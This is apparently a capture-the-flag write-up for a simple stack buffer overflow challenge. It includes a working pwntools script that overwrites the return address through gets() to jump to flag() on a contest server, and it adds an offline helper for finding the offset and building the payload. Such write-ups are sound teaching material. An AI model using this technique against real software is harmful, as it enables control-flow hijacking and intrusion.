Description: Here’s a nice little program that helps you manage your fish tank.
Super simple buffer overflow challenge. The program reads the tank name with gets(), which has no length limit, so a long line runs past the stack buffer and overwrites the saved return address.
Feeding the binary a cyclic pattern under gdb and looking up the value that lands at $rsp when the function returns shows the return address is overwritten after 152 bytes of input. The binary is not position independent, so the address of flag() is fixed; appending it after the 152 bytes of padding makes the function return into flag(), which prints the flag.
I used pwntools to exploit this binary, code is below:

```python
import struct
from pwn import *

sh = remote('shell.actf.co', 19305)

# Walk through the menu: answer the first six prompts with option 1
# until we reach the prompt that reads with gets()
for i in range(6):
    sh.recvuntil(b':')
    sh.sendline(b'1')
    print(sh.recvuntil(b':'))

buf = b"A" * 152                          # initial 152 bytes of junk up to the saved return address
buf += struct.pack("<Q", 0x4011b6)        # little-endian 64-bit address of flag()
sh.sendline(buf)
sh.interactive()                          # get flag
```
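The offset-finding step above is usually done with pwntools' cyclic and cyclic_find. As an added example (not part of the original writeup, and not pwntools' own code), the block below reimplements that logic in plain Python so it runs offline: it generates a de Bruijn pattern, recovers the offset from the 64-bit value gdb would show at $rsp after the crash, and builds the padding-plus-address payload. The 152 offset and the 0x4011b6 address are the ones from the writeup; the crash value is constructed here from the pattern itself rather than captured from a real run.

```python
import struct

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"


def de_bruijn(alphabet=ALPHABET, n=4):
    """Return the de Bruijn sequence B(k, n): every n-byte window occurs once."""
    k = len(alphabet)
    a = [0] * k * n
    sequence = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                sequence.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in sequence)


_SEQUENCE = de_bruijn()


def cyclic(length):
    """First `length` bytes of the pattern, the junk we feed to gets()."""
    return _SEQUENCE[:length]


def cyclic_find(chunk):
    """Offset at which a 4-byte window of the pattern appears (-1 if not from the pattern)."""
    return _SEQUENCE.find(chunk[:4])


def offset_from_rsp(rsp_value):
    """Given the 64-bit word gdb shows at $rsp when ret faults, recover the offset
    of the saved return address inside our input."""
    return cyclic_find(struct.pack("<Q", rsp_value))


def build_payload(offset, target):
    """Padding up to the saved return address, then the little-endian address to return to."""
    return b"A" * offset + struct.pack("<Q", target)


if __name__ == "__main__":
    # Constructed crash: pretend the 8 bytes of our 200-byte pattern that landed in the
    # saved-return-address slot (bytes 152..160) are what gdb printed at $rsp.
    pattern = cyclic(200)
    crash_rsp = struct.unpack("<Q", pattern[152:160])[0]
    off = offset_from_rsp(crash_rsp)
    print("offset to return address:", off)
    payload = build_payload(off, 0x4011b6)
    print("payload:", payload)
```

The pattern uses 4-byte windows, so one lookup of the low 4 bytes of the faulting $rsp value is enough even on 64-bit; pwntools does the same unless told otherwise.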
And that will pop the flag for you. If flag() ever segfaults on a movaps-style instruction instead of printing, the stack is misaligned by 8 after the overwritten return; returning through a single ret gadget before flag() fixes that, but it was not needed here.